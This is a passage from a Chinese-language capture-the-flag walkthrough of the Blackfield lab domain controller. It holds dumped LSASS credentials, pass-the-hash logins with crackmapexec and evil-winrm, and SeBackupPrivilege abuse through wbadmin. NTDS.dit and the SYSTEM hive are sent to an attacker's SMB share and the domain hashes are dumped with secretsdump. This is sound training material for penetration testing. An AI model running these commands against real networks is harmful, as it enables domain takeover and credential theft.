                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [5950b]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 365493 (593b5)
    session_id 2
    username UMFD-2
    domainname Font Driver Host
    logon_server 
    logon_time 2020-02-23T17:59:38.200147+00:00
    sid S-1-5-96-0-2
    luid 365493
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [593b5]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [593b5]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 257142 (3ec76)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:59:13.318909+00:00
    sid S-1-5-18
    luid 257142
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.LOCAL

    == LogonSession ==
    authentication_id 153705 (25869)
    session_id 1
    username Administrator
    domainname BLACKFIELD
    logon_server DC01
    logon_time 2020-02-23T17:59:04.506080+00:00
    sid S-1-5-21-4194615774-2175524697-3563712290-500
    luid 153705
            == MSV ==
                    Username: Administrator
                    Domain: BLACKFIELD
                    LM: NA
                    NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                    SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                    DPAPI: 240339f898b6ac4ce3f34702e4a89550
            == WDIGEST [25869]==
                    username Administrator
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: Administrator
                    Domain: BLACKFIELD.LOCAL
            == WDIGEST [25869]==
                    username Administrator
                    domainname BLACKFIELD
                    password None
            == DPAPI [25869]==
                    luid 153705
                    key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
                    masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
                    sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9

    == LogonSession ==
    authentication_id 137110 (21796)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:58:27.068590+00:00
    sid S-1-5-18
    luid 137110
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.LOCAL

    == LogonSession ==
    authentication_id 134695 (20e27)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:58:26.678019+00:00
    sid S-1-5-18
    luid 134695
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.LOCAL

    == LogonSession ==
    authentication_id 40310 (9d76)
    session_id 1
    username DWM-1
    domainname Window Manager
    logon_server 
    logon_time 2020-02-23T17:57:46.897202+00:00
    sid S-1-5-90-0-1
    luid 40310
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [9d76]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [9d76]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 40232 (9d28)
    session_id 1
    username DWM-1
    domainname Window Manager
    logon_server 
    logon_time 2020-02-23T17:57:46.897202+00:00
    sid S-1-5-90-0-1
    luid 40232
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [9d28]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [9d28]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 996 (3e4)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:57:46.725846+00:00
    sid S-1-5-20
    luid 996
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [3e4]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: dc01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [3e4]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 24410 (5f5a)
    session_id 1
    username UMFD-1
    domainname Font Driver Host
    logon_server 
    logon_time 2020-02-23T17:57:46.569111+00:00
    sid S-1-5-96-0-1
    luid 24410
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [5f5a]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [5f5a]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 406499 (633e3)
    session_id 2
    username svc_backup
    domainname BLACKFIELD
    logon_server DC01
    logon_time 2020-02-23T18:00:03.423728+00:00
    sid S-1-5-21-4194615774-2175524697-3563712290-1413
    luid 406499
            == MSV ==
                    Username: svc_backup
                    Domain: BLACKFIELD
                    LM: NA
                    NT: 9658d1d1dcd9250115e2205d9f48400d
                    SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                    DPAPI: a03cd8e9d30171f3cfe8caad92fef621
            == WDIGEST [633e3]==
                    username svc_backup
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: svc_backup
                    Domain: BLACKFIELD.LOCAL
            == WDIGEST [633e3]==
                    username svc_backup
                    domainname BLACKFIELD
                    password None
            == DPAPI [633e3]==
                    luid 406499
                    key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
                    masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
                    sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991

    == LogonSession ==
    authentication_id 366665 (59849)
    session_id 2
    username DWM-2
    domainname Window Manager
    logon_server 
    logon_time 2020-02-23T17:59:38.293877+00:00
    sid S-1-5-90-0-2
    luid 366665
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [59849]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [59849]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 366649 (59839)
    session_id 2
    username DWM-2
    domainname Window Manager
    logon_server 
    logon_time 2020-02-23T17:59:38.293877+00:00
    sid S-1-5-90-0-2
    luid 366649
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [59839]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [59839]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 256940 (3ebac)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:59:13.068835+00:00
    sid S-1-5-18
    luid 256940
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.LOCAL

    == LogonSession ==
    authentication_id 136764 (2163c)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:58:27.052945+00:00
    sid S-1-5-18
    luid 136764
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.LOCAL

    == LogonSession ==
    authentication_id 134935 (20f17)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:58:26.834285+00:00
    sid S-1-5-18
    luid 134935
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.LOCAL

    == LogonSession ==
    authentication_id 997 (3e5)
    session_id 0
    username LOCAL SERVICE
    domainname NT AUTHORITY
    logon_server 
    logon_time 2020-02-23T17:57:47.162285+00:00
    sid S-1-5-19
    luid 997
            == Kerberos ==
                    Username: 
                    Domain: 

    == LogonSession ==
    authentication_id 24405 (5f55)
    session_id 0
    username UMFD-0
    domainname Font Driver Host
    logon_server 
    logon_time 2020-02-23T17:57:46.569111+00:00
    sid S-1-5-96-0-0
    luid 24405
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [5f55]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [5f55]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 24294 (5ee6)
    session_id 0
    username UMFD-0
    domainname Font Driver Host
    logon_server 
    logon_time 2020-02-23T17:57:46.554117+00:00
    sid S-1-5-96-0-0
    luid 24294
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [5ee6]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [5ee6]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 24282 (5eda)
    session_id 1
    username UMFD-1
    domainname Font Driver Host
    logon_server 
    logon_time 2020-02-23T17:57:46.554117+00:00
    sid S-1-5-96-0-1
    luid 24282
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [5eda]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: DC01$
                    Domain: BLACKFIELD.local
                    Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
            == WDIGEST [5eda]==
                    username DC01$
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 22028 (560c)
    session_id 0
    username 
    domainname 
    logon_server 
    logon_time 2020-02-23T17:57:44.959593+00:00
    sid None
    luid 22028
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA

    == LogonSession ==
    authentication_id 999 (3e7)
    session_id 0
    username DC01$
    domainname BLACKFIELD
    logon_server 
    logon_time 2020-02-23T17:57:44.913221+00:00
    sid S-1-5-18
    luid 999
            == WDIGEST [3e7]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: dc01$
                    Domain: BLACKFIELD.LOCAL
            == WDIGEST [3e7]==
                    username DC01$
                    domainname BLACKFIELD
                    password None
            == DPAPI [3e7]==
                    luid 999
                    key_guid 0f7e926c-c502-4cad-90fa-32b78425b5a9
                    masterkey ebbb538876be341ae33e88640e4e1d16c16ad5363c15b0709d3a97e34980ad5085436181f66fa3a0ec122d461676475b24be001736f920cd21637fee13dfc616
                    sha1_masterkey ed834662c755c50ef7285d88a4015f9c5d6499cd
            == DPAPI [3e7]==
                    luid 999
                    key_guid f611f8d0-9510-4a8a-94d7-5054cc85a654
                    masterkey 7c874d2a50ea2c4024bd5b24eef4515088cf3fe21f3b9cafd3c81af02fd5ca742015117e7f2675e781ce7775fcde2740ae7207526ce493bdc89d2ae3eb0e02e9
                    sha1_masterkey cf1c0b79da85f6c84b96fd7a0a5d7a5265594477
            == DPAPI [3e7]==
                    luid 999
                    key_guid 31632c55-7a7c-4c51-9065-65469950e94e
                    masterkey 825063c43b0ea082e2d3ddf6006a8dcced269f2d34fe4367259a0907d29139b58822349e687c7ea0258633e5b109678e8e2337d76d4e38e390d8b980fb737edb
                    sha1_masterkey 6f3e0e7bf68f9a7df07549903888ea87f015bb01
            == DPAPI [3e7]==
                    luid 999
                    key_guid 7e0da320-072c-4b4a-969f-62087d9f9870
                    masterkey 1fe8f550be4948f213e0591eef9d876364246ea108da6dd2af73ff455485a56101067fbc669e99ad9e858f75ae9bd7e8a6b2096407c4541e2b44e67e4e21d8f5
                    sha1_masterkey f50955e8b8a7c921fdf9bac7b9a2483a9ac3ceed
Hash:
    svc_backup:9658d1d1dcd9250115e2205d9f48400d
    Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62

使用ldapsearch查询密码错误次数

命令:
    ldapsearch -H ldap://10.10.10.192 -D 'BLACKFIELD\support' -w '#00^BlackKnight' -b 'dc=blackfield,dc=local' -s sub "*" | grep lockoutThreshold
回显:
    lockoutThreshold: 0
    说明密码错误没有限制不会导致账号被锁的情况

尝试使用CrackMapExec验证hash登录

为什么使用CrackMapExec验证:
    该工具设计概念是利用AD内置功能/协议达成其功能并规避大多数终端防护/IDS/IPS解决方案,因此适合用于验证账号且不易触发告警。
svc_backup使用hash验证的命令:
    crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
回显:
    SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
    SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
    svc_backup账号SMB访问成功
administrator验证:
    crackmapexec smb 10.10.10.192 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
回显:
    SMB         10.10.10.192    445    NONE             [*]  x64 (name:) (domain:) (signing:True) (SMBv1:False)
    SMB         10.10.10.192    445    NONE             [-] \Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE 
    administrator验证失败

尝试进行登录

    使用wmiexec.py登录:
            python3 wmiexec.py -hashes :9658d1d1dcd9250115e2205d9f48400d svc_backup@10.10.10.192
            Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
            [*] SMBv3.0 dialect used
            [-] rpc_s_access_denied
    发现登录失败尝试下evil-winrm登录。
    evil-winrm登录命令:
            evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
    回显:
            Evil-WinRM shell v3.4

            Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

            Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

            Info: Establishing connection to remote endpoint

            *Evil-WinRM* PS C:\Users\svc_backup\Documents>
    登陆成功

发现Evil-WinRM可以进行登录,现在尝试进行权限提升。

    通过之前bloodhound得知该用户属于backup_operators组的成员,因此该用户也很有可能是启用SeBackupPrivilege 权限的用户。
    查询:
    *Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeBackupPrivilege             Back up files and directories  Enabled
    SeRestorePrivilege            Restore files and directories  Enabled
    SeShutdownPrivilege           Shut down the system           Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
    发现确实拥有SeBackupPrivilege权限,可以尝试使用NTDS.dit 的卷影副本来进行提权。
    命令:
    robocopy /b C:\Users\Administrator\Desktop\ C:\
    拷贝Administrator桌面内容到C盘根目录发现存在root.txt文件可以直接cat C:\root.txt 获取System flag靶标,但其实现在并非真的System权限,想更加深入的朋友可以看一下内容进行提权。

NTDS.dit卷影副本提权smb匿名共享版本打法

    编辑/etc/samba/smb.conf文件开启smb匿名访问
    [global]
            map to guest = Bad User
            server role = standalone server
            usershare allow guests = yes
            idmap config * : backend = tdb
            interfaces = tun0
            smb ports = 445
    [smb]
            comment = Samba
            path = /tmp/
            guest ok = yes
            read only = no
            browsable = yes
            force user = smbuser
    攻击机创建一个smbuser的账号
    命令:
           adduser smbuser          创建账号
           smbpasswd -a smbuser     设置smb密码(123)
    启动smb
            systemctl restart smbd      
    建立连接:
            *Evil-WinRM* PS C:\> net use k: \\10.10.16.10\smb /user:smbuser 123
    利用wbadmin备份NTDS文件夹:
            *Evil-WinRM* PS C:\> echo "Y" | wbadmin start backup -backuptarget:\\10.10.16.10\smb -include:c:\windows\ntds

wbadmin利用方式ntds卷影提权

    检查备份版本:
            wbadmin get versions
    回显:
    *Evil-WinRM* PS k:\> wbadmin get versions
    [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK
    [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK
    wbadmin 1.0 - Backup command-line tool
    (C) Copyright Microsoft Corporation. All rights reserved.

    Backup time: 9/21/2020 3:00 PM
    Backup location: Network Share labeled \\10.10.14.4\blackfieldA
    Version identifier: 09/21/2020-23:00
    Can recover: Volume(s), File(s)

    Backup time: 1/13/2023 8:11 AM
    Backup location: Network Share labeled \\10.10.16.10\smb
    Version identifier: 01/13/2023-16:11
    Can recover: Volume(s), File(s)        
    可以看到有两个版本时间分别是2023-1-13和2020-9-21
    使用Version identifier: 01/13/2023-16:11进行恢复NTDS.dit文件并指定备份版本
    命令:
            echo "Y" | wbadmin start recovery -version:01/13/2023-16:11 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
    回显:
            *Evil-WinRM* PS C:\> echo "Y" | wbadmin start recovery -version:01/13/2023-16:11 -itemtype:file -
            items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
            [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK
            [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK
            wbadmin 1.0 - Backup command-line tool
            (C) Copyright Microsoft Corporation. All rights reserved.

            Retrieving volume information...
            You have chosen to recover the file(s) c:\windows\ntds\ntds.dit from the
            backup created on 1/13/2023 8:11 AM to C:\.
            Preparing to recover files...

            Do you want to continue?
            [Y] Yes [N] No Y

            [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK
            [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK
            Running the recovery operation for c:\windows\ntds\ntds.dit, copied (0%).
            Running the recovery operation for c:\windows\ntds\ntds.dit, copied (48%).
            Currently recovering c:\windows\ntds\ntds.dit.
            Successfully recovered c:\windows\ntds\ntds.dit to C:\.
            The recovery operation completed.
            Summary of the recovery operation:
            --------------------

            Recovery of c:\windows\ntds\ntds.dit to C:\ successfully completed.
            Total bytes recovered: 18.00 MB
            Total files recovered: 1
            Total files failed: 0

            Log of files successfully recovered:
            C:\Windows\Logs\WindowsServerBackup\FileRestore-13-01-2023_16-32-45.log        
    发现C盘根目录已经存在恢复的ntds.dit的文件
            *Evil-WinRM* PS C:\> ls
                    [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK
                    [proxychains] Strict chain  ...  45.32.93.126:9999  ...  10.10.10.192:5985  ...  OK


                    Directory: C:\


                    Mode                LastWriteTime         Length Name
                    ----                -------------         ------ ----
                    d-----        5/26/2020   5:38 PM                PerfLogs
                    d-----         6/3/2020   9:47 AM                profiles
                    d-r---        3/19/2020  11:08 AM                Program Files
                    d-----         2/1/2020  11:05 AM                Program Files (x86)
                    d-r---        2/23/2020   9:16 AM                Users
                    d-----        9/21/2020   4:29 PM                Windows
                    -a----        2/28/2020   4:36 PM            447 notes.txt
                    -a----        1/13/2023   8:11 AM       18874368 ntds.dit 
    导出system hive命令:
            reg save HKLM\SYSTEM C:\system.hive                
    nods.dit和system.hive都已经存储在C盘根下
            *Evil-WinRM* PS C:\> ls


            Directory: C:\


            Mode                LastWriteTime         Length Name
            ----                -------------         ------ ----
            d-----        5/26/2020   5:38 PM                PerfLogs
            d-----         6/3/2020   9:47 AM                profiles
            d-r---        3/19/2020  11:08 AM                Program Files
            d-----         2/1/2020  11:05 AM                Program Files (x86)
            d-r---        2/23/2020   9:16 AM                Users
            d-----        9/21/2020   4:29 PM                Windows
            -a----        2/28/2020   4:36 PM            447 notes.txt
            -a----        1/13/2023   8:11 AM       18874368 ntds.dit
            -a----        1/13/2023   9:47 AM       17580032 system.hive
    拷贝到攻击机smb共享中
    命令:
            cp ntds.dit \\10.10.16.10\smb\NTDS.dit
            cp system.hive \\10.10.16.10\smb\system.hive

Impacket包下secretsdump.py进行域内hash提取

    文件位于攻击机tmp目录下
    命令:
            python3 secretsdump.py -ntds /home/kali/Desktop/temp/NTDS.dit -system /home/kali/Desktop/temp/system.hive LOCAL
    获取重要hash
            Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d26029b76627770999a4d2b3a9ddc9c5:::
            krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
            audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
            support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
            尝试使用wmiexec.py使用Administrator账号登录域控
    回显:
            Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

            [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
            [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
            [*] Searching for pekList, be patient
            [*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
            [*] Reading and decrypting hashes from /home/kali/Desktop/temp/NTDS.dit 
            Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d26029b76627770999a4d2b3a9ddc9c5:::
            krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
            audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
            support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
            BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD706381:1109:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD937395:1110:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD553715:1111:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD840481:1112:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD622501:1113:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD787464:1114:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
